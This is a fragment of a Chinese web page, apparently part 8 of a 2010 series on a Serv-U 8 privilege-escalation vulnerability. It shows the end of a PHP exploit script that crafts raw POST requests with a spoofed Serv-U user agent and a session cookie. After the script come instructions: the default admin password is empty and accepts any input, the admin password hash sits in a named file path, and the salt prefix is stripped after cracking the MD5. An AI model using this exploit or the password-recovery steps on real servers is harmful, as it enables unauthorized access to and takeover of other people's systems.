对联 ·故事 ·史海钩沉 ·人物档案 ·地方风俗 ·谚语大全 ·讽刺与幽默 · 赚钱 · 法律 · 在线教研 · 会员中心 · 心理测试 · 魔鬼词典 · 顺口溜
 
主页特效 网页特效 百家姓
娱乐 歇后语 绕口令 脑筋急转弯
 
谚语 谜语 名言 邮政编码
便民 酒方 验方 偏方 站长工具  
 
算命 风俗 手相 爱情
女孩 音乐 面相 星座 血型
 
饮食 穴道 偏方 医药
生活 软件 硬件 解梦 高考



   JS特效



实用工具
便民服务 加密解密
 
魅力高密 民间故事 Flash教程 PS教程 最新国内新闻
新华字典 黄道吉日 英语园地  万年历 Html2anycode
  首页 | 美图 | 短信 | 安全 | 校园 | 网站 | 游戏 | UFO | 文秘 | 生活 | 信息技术 | 论文 | 人生 | 情感 | 日记
返回首页
当前位置: 主页 > 网络安全 >

发现serv-u8提权漏洞(8)

时间:2010-01-15 13:37来源:未知 作者:admin 点击:
} $request.="POST ".$URL_post." HTTP/1.1"; $request.="Host: ".$host_post.""; $request.="Referer: ".$referer.""; $request.="Content-type: application/x-www-form-urlencoded"; $request.="Content-length:
  
    }  
    $request.="POST ".$URL_post." HTTP/1.1";  
    $request.="Host: ".$host_post."";  
    $request.="Referer: ".$referer."";  
    $request.="Content-type: application/x-www-form-urlencoded";  
    $request.="Content-length: ".strlen($data_string)."";  
    $request.="User-Agent: Serv-U";  
    $request.="x-user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)";  
    $request.="Accept: */*";  
    $request.="Cache-Contro: no-cache";  
    $request.="UA-CPU: x86";  
      
    if ($sessionid!="")  
    {  
        $request.="Cookie: Session=".$sessionid."";  
    }  
    $request.="";  
    $request.=$data_string."";  
 
    return $request;  
}  
 
//getMidfor2str copy from internet  
function getmidstr($L,$R,$str)  
{    
    $int_l=strpos($str,$L);  
    $int_r=strpos($str,$R);  
    If ($int_l>-1&&$int_l>-1)  
    {  
        $str_put=substr($str,$int_l+strlen($L),($int_r-$int_l-strlen($L)));  
        return $str_put;  
    }  
    else  
        return "没找到需要的变量";  
}  
?>  
              </pre>  
        </form>  
<div id="adminpassdiv" style="display:none">  
<pre>  
默认为空,如果密码为空,<b>填什么都能进去。</b>  
如果修改过,管理员密码默认会在这里:  
<b>C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive</b>  
文件中找到一个MD5密码值。  
C:\Program Files\RhinoSoft.com\Serv-U  
是su的根目录。  
密码值的样式为(假设是123456)  
kx#######################  
#代表123456的32位MD5加密,而kx则是su对md5的密码算法改进的随机2位字符。  
破解后的密码为<b>kx</b>123456,去掉kx就是密码了。  
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
最新评论 查看所有评论
发表评论 查看所有评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 密码: 验证码:
赞助商位置
推荐内容
杂七杂八